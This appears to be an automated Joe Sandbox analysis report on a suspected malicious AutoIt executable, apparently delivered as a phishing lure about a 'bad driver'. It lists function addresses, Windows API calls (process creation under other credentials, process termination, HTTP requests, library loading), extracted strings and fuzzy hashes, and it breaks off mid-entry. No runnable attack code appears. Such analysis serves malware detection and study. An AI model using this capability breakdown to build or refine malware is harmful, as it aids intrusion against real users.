Associated: 00000000.00000002.3289527528.0000000000C65000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289576828.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289599950.0000000000C78000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Case_Your company bad driver Vehicle No.jbxd

Similarity

API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
String ID:
API String ID: 4137160315-0
Opcode ID: ec7703f350065cb9d012145c2062be5b00a1c83fed394f462cbd635227a0af6c
Instruction ID: b9c15f41a18647026b8d5571cdba43c9d6037d7cb3ecc24a1dae25d9fe87bcb2
Opcode Fuzzy Hash: ec7703f350065cb9d012145c2062be5b00a1c83fed394f462cbd635227a0af6c
Instruction Fuzzy Hash: 4331D272508315ABD720EF14D849F9FBBA9FF89314F000A19F59997191C670EA49CB92

Uniqueness

Uniqueness Score: -1.00%

Function 00C08D5B Relevance: 9.1, APIs: 6, Instructions: 69memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00C085F1: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00C08608
Part of subcall function 00C085F1: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00C08612
Part of subcall function 00C085F1: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00C08621
Part of subcall function 00C085F1: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00C08628
Part of subcall function 00C085F1: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00C0863E

GetLengthSid.ADVAPI32(?,00000000,00C08977), ref: 00C08DAC
GetProcessHeap.KERNEL32(00000008,00000000), ref: 00C08DB8
HeapAlloc.KERNEL32(00000000), ref: 00C08DBF
CopySid.ADVAPI32(00000000,00000000,?), ref: 00C08DD8
GetProcessHeap.KERNEL32(00000000,00000000,00C08977), ref: 00C08DEC
HeapFree.KERNEL32(00000000), ref: 00C08DF3

Memory Dump Source

Source File: 00000000.00000002.3289291275.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.3289182176.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C3F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C65000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289576828.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289599950.0000000000C78000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Case_Your company bad driver Vehicle No.jbxd

Similarity

API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
String ID:
API String ID: 3008561057-0
Opcode ID: da327664b12e035d8879657fdcab3779269b23a007539c294e63bc2f9d880935
Instruction ID: 6a3c40bda20197b2d3a3e810d59c52491222589882e675748ca3e5a61ca01796
Opcode Fuzzy Hash: da327664b12e035d8879657fdcab3779269b23a007539c294e63bc2f9d880935
Instruction Fuzzy Hash: E811EE31910606FFDB149FA4DC08BAE7BA9EF50315F10862DE88593290CB329A09DB60

Uniqueness

Uniqueness Score: -1.00%

Function 00C08AF9 Relevance: 9.1, APIs: 6, Instructions: 65processCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 00C08B2A
OpenProcessToken.ADVAPI32(00000000), ref: 00C08B31
CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00C08B40
CloseHandle.KERNEL32(00000004), ref: 00C08B4B
CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00C08B7A
DestroyEnvironmentBlock.USERENV(00000000), ref: 00C08B8E

Memory Dump Source

Source File: 00000000.00000002.3289291275.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.3289182176.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C3F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C65000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289576828.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289599950.0000000000C78000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Case_Your company bad driver Vehicle No.jbxd

Similarity

API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
String ID:
API String ID: 1413079979-0
Opcode ID: 7233b3efb957301ba4425fd35c738dd331359bfe1bb76edce9c3e7717fc147b7
Instruction ID: 326b61cbb7cc9249904cf45fa79bc42f11f3794d26a718f80d5326ed2858e5da
Opcode Fuzzy Hash: 7233b3efb957301ba4425fd35c738dd331359bfe1bb76edce9c3e7717fc147b7
Instruction Fuzzy Hash: 91116DB250120DEBDF018FA8DD49FDE7BA9EF08704F044069FE44A21A0C7728E65DB60

Uniqueness

Uniqueness Score: -1.00%

Function 00C3C19A Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

Part of subcall function 00BB12F3: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00BB134D
Part of subcall function 00BB12F3: SelectObject.GDI32(?,00000000), ref: 00BB135C
Part of subcall function 00BB12F3: BeginPath.GDI32(?), ref: 00BB1373
Part of subcall function 00BB12F3: SelectObject.GDI32(?,00000000), ref: 00BB139C

MoveToEx.GDI32(00000000,-00000002,?,00000000), ref: 00C3C1C4
LineTo.GDI32(00000000,00000003,?), ref: 00C3C1D8
MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 00C3C1E6
LineTo.GDI32(00000000,00000000,?), ref: 00C3C1F6
EndPath.GDI32(00000000), ref: 00C3C206
StrokePath.GDI32(00000000), ref: 00C3C216

Memory Dump Source

Source File: 00000000.00000002.3289291275.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.3289182176.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C3F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C65000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289576828.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289599950.0000000000C78000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Case_Your company bad driver Vehicle No.jbxd

Similarity

API ID: Path$LineMoveObjectSelect$BeginCreateStroke
String ID:
API String ID: 43455801-0
Opcode ID: e76b887d3cbf2d90bc54972d257a895cc54cf4ed21bd9e91543db32c7262a820
Instruction ID: 22f044efca3dc64a13e4e2f94ac4aca5a4159d64fe76c5054b09409cde8d3f0e
Opcode Fuzzy Hash: e76b887d3cbf2d90bc54972d257a895cc54cf4ed21bd9e91543db32c7262a820
Instruction Fuzzy Hash: ED11097640010DBFEB119F94DC88FEE7FADEB08354F048425BA185A1A1C7729E95DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00BD03A2 Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON

Download Yara Rule

APIs

MapVirtualKeyW.USER32(0000005B,00000000), ref: 00BD03D3
MapVirtualKeyW.USER32(00000010,00000000), ref: 00BD03DB
MapVirtualKeyW.USER32(000000A0,00000000), ref: 00BD03E6
MapVirtualKeyW.USER32(000000A1,00000000), ref: 00BD03F1
MapVirtualKeyW.USER32(00000011,00000000), ref: 00BD03F9
MapVirtualKeyW.USER32(00000012,00000000), ref: 00BD0401

Memory Dump Source

Source File: 00000000.00000002.3289291275.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.3289182176.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C3F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C65000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289576828.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289599950.0000000000C78000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Case_Your company bad driver Vehicle No.jbxd

Similarity

API ID: Virtual
String ID:
API String ID: 4278518827-0
Opcode ID: 405436f540f9d1faf8e416ff06eaaed496e47d2d1df49e8a50115ce5ee0e90d0
Instruction ID: 2517315e1d9185348034fa3d9ae1e3e9e092715fa2a876d683907988582195f9
Opcode Fuzzy Hash: 405436f540f9d1faf8e416ff06eaaed496e47d2d1df49e8a50115ce5ee0e90d0
Instruction Fuzzy Hash: 680148B09017597DE3008F5A8C85B56FEB8FF19354F00411BA15847941C7B5A864CBE5

Uniqueness

Uniqueness Score: -1.00%

Function 00C1568B Relevance: 9.0, APIs: 6, Instructions: 43windowtimethreadCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00C1569B
SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00C156B1
GetWindowThreadProcessId.USER32(?,?), ref: 00C156C0
OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00C156CF
TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00C156D9
CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00C156E0

Memory Dump Source

Source File: 00000000.00000002.3289291275.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.3289182176.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C3F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C65000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289576828.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289599950.0000000000C78000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Case_Your company bad driver Vehicle No.jbxd

Similarity

API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
String ID:
API String ID: 839392675-0
Opcode ID: ea0c496c7b103c470c07c058aad8eaf86ea04976710a282b8282247e8cc4378e
Instruction ID: d28d1af19e2b388d3e7f50382b56fcd81a526b1457ab44e4789d5f8347ac8796
Opcode Fuzzy Hash: ea0c496c7b103c470c07c058aad8eaf86ea04976710a282b8282247e8cc4378e
Instruction Fuzzy Hash: A4F03032A51558BBE7215BA2EC0EFEF7B7CEFC6B11F00056DFA05D1060D7A11A0296B5

Uniqueness

Uniqueness Score: -1.00%

Function 00C174D2 Relevance: 9.0, APIs: 6, Instructions: 33synchronizationthreadCOMMONLIBRARYCODE

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(?,?), ref: 00C174E5
EnterCriticalSection.KERNEL32(?,?,00BC1044,?,?), ref: 00C174F6
TerminateThread.KERNEL32(00000000,000001F6,?,00BC1044,?,?), ref: 00C17503
WaitForSingleObject.KERNEL32(00000000,000003E8,?,00BC1044,?,?), ref: 00C17510

Part of subcall function 00C16ED7: CloseHandle.KERNEL32(00000000,?,00C1751D,?,00BC1044,?,?), ref: 00C16EE1

InterlockedExchange.KERNEL32(?,000001F6), ref: 00C17523
LeaveCriticalSection.KERNEL32(?,?,00BC1044,?,?), ref: 00C1752A

Memory Dump Source

Source File: 00000000.00000002.3289291275.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.3289182176.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C3F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C65000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289576828.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289599950.0000000000C78000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Case_Your company bad driver Vehicle No.jbxd

Similarity

API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
String ID:
API String ID: 3495660284-0
Opcode ID: e1400d6cd7111b9c8cccf55f87ef7ecdaa0896e349591fb97bc9ecee9a29fb25
Instruction ID: e49d1de917798409a1dcae8f8f95632155316218d0825e8f2a4f091060d4451b
Opcode Fuzzy Hash: e1400d6cd7111b9c8cccf55f87ef7ecdaa0896e349591fb97bc9ecee9a29fb25
Instruction Fuzzy Hash: C2F05E3A950612EBDB111B64FD8CFEF773AEF45302B000A39F602914B2CBB65946DB50

Uniqueness

Uniqueness Score: -1.00%

Function 00C08E74 Relevance: 9.0, APIs: 6, Instructions: 23memorysynchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000000FF), ref: 00C08E7F
UnloadUserProfile.USERENV(?,?), ref: 00C08E8B
CloseHandle.KERNEL32(?), ref: 00C08E94
CloseHandle.KERNEL32(?), ref: 00C08E9C
GetProcessHeap.KERNEL32(00000000,?), ref: 00C08EA5
HeapFree.KERNEL32(00000000), ref: 00C08EAC

Memory Dump Source

Source File: 00000000.00000002.3289291275.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.3289182176.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C3F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C65000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289576828.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289599950.0000000000C78000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Case_Your company bad driver Vehicle No.jbxd

Similarity

API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
String ID:
API String ID: 146765662-0
Opcode ID: e369a42d6072ddbf1c845b52f4039587133dc2d557569009898ffa6d072bad77
Instruction ID: 7a5621d98bd6d21c2ae1d0acf60595c02b72bdb1c1a1a7fe87fab06868f79154
Opcode Fuzzy Hash: e369a42d6072ddbf1c845b52f4039587133dc2d557569009898ffa6d072bad77
Instruction Fuzzy Hash: EEE0C236414001FBDA021FE2EC0CF1EBB69FB89322B108A38F21981070CB329426DB50

Uniqueness

Uniqueness Score: -1.00%

Function 00C28902 Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 225COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00C28928
CharUpperBuffW.USER32(?,?), ref: 00C28A37
VariantClear.OLEAUT32(?), ref: 00C28BAF

Part of subcall function 00C17804: VariantInit.OLEAUT32(00000000), ref: 00C17844
Part of subcall function 00C17804: VariantCopy.OLEAUT32(00000000,?), ref: 00C1784D
Part of subcall function 00C17804: VariantClear.OLEAUT32(00000000), ref: 00C17859

Strings

Incorrect Parameter format, xrefs: 00C28960, 00C28B22
AUTOIT.ERROR, xrefs: 00C28A3D

Memory Dump Source

Source File: 00000000.00000002.3289291275.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.3289182176.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C3F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C65000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289576828.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289599950.0000000000C78000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Case_Your company bad driver Vehicle No.jbxd

Similarity

API ID: Variant$ClearInit$BuffCharCopyUpper
String ID: AUTOIT.ERROR$Incorrect Parameter format
API String ID: 4237274167-1221869570
Opcode ID: 6e9dff7678d0ae1d2a8fd8c5426e296d7a065fc79a043e80bf279aa5ed2636e8
Instruction ID: 25f9bcfd182bfaf1164abca62e22858427e9d2c736d28b448929323ce837a2ae
Opcode Fuzzy Hash: 6e9dff7678d0ae1d2a8fd8c5426e296d7a065fc79a043e80bf279aa5ed2636e8
Instruction Fuzzy Hash: E8918E75608301DFC710EF24D48596ABBF4EF89314F04896EF89A8B361DB31E949CB52

Uniqueness

Uniqueness Score: -1.00%

Function 00C12F86 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 195windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00BCFEC6: _wcscpy.LIBCMT ref: 00BCFEE9

_memset.LIBCMT ref: 00C13077
GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00C130A6
SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00C13159
SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00C13187

Strings

0, xrefs: 00C13063

Memory Dump Source

Source File: 00000000.00000002.3289291275.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.3289182176.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C3F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C65000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289576828.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289599950.0000000000C78000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Case_Your company bad driver Vehicle No.jbxd

Similarity

API ID: ItemMenu$Info$Default_memset_wcscpy
String ID: 0
API String ID: 4152858687-4108050209
Opcode ID: ff3c9212121feecd68a2021a113550f5f2f8f67a24315b07b6707960250b8b42
Instruction ID: 0eff66c707e5bb9535f07f782718891c63fb0d91b9fd9d6098154742c1c44b15
Opcode Fuzzy Hash: ff3c9212121feecd68a2021a113550f5f2f8f67a24315b07b6707960250b8b42
Instruction Fuzzy Hash: E051C471608380ABD7159F28D8457EFB7E4EF46328F14492DF8A5D21A1DB70CB84E752

Uniqueness

Uniqueness Score: -1.00%

Function 00C0DA5D Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 121comlibraryloaderCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00C0DAC5
SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 00C0DAFB
GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 00C0DB0C
SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00C0DB8E

Strings

DllGetClassObject, xrefs: 00C0DB01

Memory Dump Source

Source File: 00000000.00000002.3289291275.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.3289182176.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C3F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C65000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289576828.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289599950.0000000000C78000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Case_Your company bad driver Vehicle No.jbxd

Similarity

API ID: ErrorMode$AddressCreateInstanceProc
String ID: DllGetClassObject
API String ID: 753597075-1075368562
Opcode ID: 0a635a1d1e003290c4f0f3240bc110177a393dd328b8ef3a231c40b9d799effa
Instruction ID: e77b4aeaad2bdf48d7a09c22b2ea4bf415c47f1e67dcca3e171f59ed4353240a
Opcode Fuzzy Hash: 0a635a1d1e003290c4f0f3240bc110177a393dd328b8ef3a231c40b9d799effa
Instruction Fuzzy Hash: C7416FB1600208EFDB15CF95C884B9ABBB9EF44350F1584ADED069F286D7B1DE44DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00C12C42 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 114windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00C12CAF
GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 00C12CCB
DeleteMenu.USER32(?,00000007,00000000), ref: 00C12D11
DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00C76890,00000000), ref: 00C12D5A

Strings

0, xrefs: 00C12CA4

Memory Dump Source

Source File: 00000000.00000002.3289291275.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.3289182176.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C3F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C65000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289576828.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289599950.0000000000C78000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Case_Your company bad driver Vehicle No.jbxd

Similarity

API ID: Menu$Delete$InfoItem_memset
String ID: 0
API String ID: 1173514356-4108050209
Opcode ID: 2a27ee2889287ed33e3633c166f77e8da58d36d0b0768711ee7e1da273a4c45e
Instruction ID: eece186012768bc1bcc81ea51de5201709ba86ce350801be7ad0d41aedfaf5a8
Opcode Fuzzy Hash: 2a27ee2889287ed33e3633c166f77e8da58d36d0b0768711ee7e1da273a4c45e
Instruction Fuzzy Hash: 8341C1352043419FD720EF24D884B9ABBE8EF86320F00465EF965972E1DB70E965DB92

Uniqueness

Uniqueness Score: -1.00%

Function 00C2DAB9 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 101COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 00C2DAD9

Part of subcall function 00BB79AB: _memmove.LIBCMT ref: 00BB79F9

Strings

cdecl, xrefs: 00C2DB30
stdcall, xrefs: 00C2DB5B
none, xrefs: 00C2DBB4
winapi, xrefs: 00C2DB4A

Memory Dump Source

Source File: 00000000.00000002.3289291275.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.3289182176.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C3F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C65000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289576828.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289599950.0000000000C78000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Case_Your company bad driver Vehicle No.jbxd

Similarity

API ID: BuffCharLower_memmove
String ID: cdecl$none$stdcall$winapi
API String ID: 3425801089-567219261
Opcode ID: 6dd8910e6ba98064cc96098c65e2f7b6f962c0be7be63009f2fc5f46e78f8144
Instruction ID: d8c87aa4c0e03ef5a2ee22cb134ae774d46f88502b65edeaeef6fcab9eae4068
Opcode Fuzzy Hash: 6dd8910e6ba98064cc96098c65e2f7b6f962c0be7be63009f2fc5f46e78f8144
Instruction Fuzzy Hash: 29319071500219AFCF10EF64D8919FEB7F4FF15310B10866AE876A7AD1DB71AA06CB80

Uniqueness

Uniqueness Score: -1.00%

Function 00C09372 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 94windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00BB7F41: _memmove.LIBCMT ref: 00BB7F82

Part of subcall function 00C0B0C4: GetClassNameW.USER32(?,?,000000FF), ref: 00C0B0E7

SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00C093F6
SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00C09409
SendMessageW.USER32(?,00000189,?,00000000), ref: 00C09439

Part of subcall function 00BB7D2C: _memmove.LIBCMT ref: 00BB7D66

Strings

ComboBox, xrefs: 00C09380
ListBox, xrefs: 00C093B5

Memory Dump Source

Source File: 00000000.00000002.3289291275.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.3289182176.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C3F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C65000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289576828.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289599950.0000000000C78000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Case_Your company bad driver Vehicle No.jbxd

Similarity

API ID: MessageSend$_memmove$ClassName
String ID: ComboBox$ListBox
API String ID: 365058703-1403004172
Opcode ID: a592dbc6de9ec9d6f663b0fe113de7ad9ca5860d3480d3f5b7d612a16438495b
Instruction ID: c4175806ac6a42dcda5ff4a6f470b72425c47ea44505309d12b085797ba1e5e7
Opcode Fuzzy Hash: a592dbc6de9ec9d6f663b0fe113de7ad9ca5860d3480d3f5b7d612a16438495b
Instruction Fuzzy Hash: 772104B1940108BBDB14ABB0CC86AFFB7BCDF45350F104569F921972E2DB744A0AD610

Uniqueness

Uniqueness Score: -1.00%

Function 00C21B21 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 86networkCOMMON

Download Yara Rule

APIs

InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00C21B40
HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00C21B66
HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00C21B96
InternetCloseHandle.WININET(00000000), ref: 00C21BDD

Part of subcall function 00C22777: GetLastError.KERNEL32(?,?,00C21B0B,00000000,00000000,00000001), ref: 00C2278C
Part of subcall function 00C22777: SetEvent.KERNEL32(?,?,00C21B0B,00000000,00000000,00000001), ref: 00C227A1

Strings

, xrefs: 00C21B87

Memory Dump Source

Source File: 00000000.00000002.3289291275.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.3289182176.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C3F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C65000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289576828.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289599950.0000000000C78000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Case_Your company bad driver Vehicle No.jbxd

Similarity

API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
String ID:
API String ID: 3113390036-3916222277
Opcode ID: c697fdf9c26d4adc107106cdfa4266ea7622d12ce3193d3faa614dedfc2de4e1
Instruction ID: ce8de78ecd947bf7e6c152f30cd5f403fb95ffc101b11edac85a110c822882be
Opcode Fuzzy Hash: c697fdf9c26d4adc107106cdfa4266ea7622d12ce3193d3faa614dedfc2de4e1
Instruction Fuzzy Hash: DF21CFB5504318BFEB119F21EC85FBF76FCEB59B44F14412AF805E2A40EA309E0597A1

Uniqueness

Uniqueness Score: -1.00%

Function 00C36656 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 80windowlibraryCOMMON

Download Yara Rule

APIs

Part of subcall function 00BB1D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00BB1D73
Part of subcall function 00BB1D35: GetStockObject.GDI32(00000011), ref: 00BB1D87
Part of subcall function 00BB1D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00BB1D91

SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00C366D0
LoadLibraryW.KERNEL32(?), ref: 00C366D7
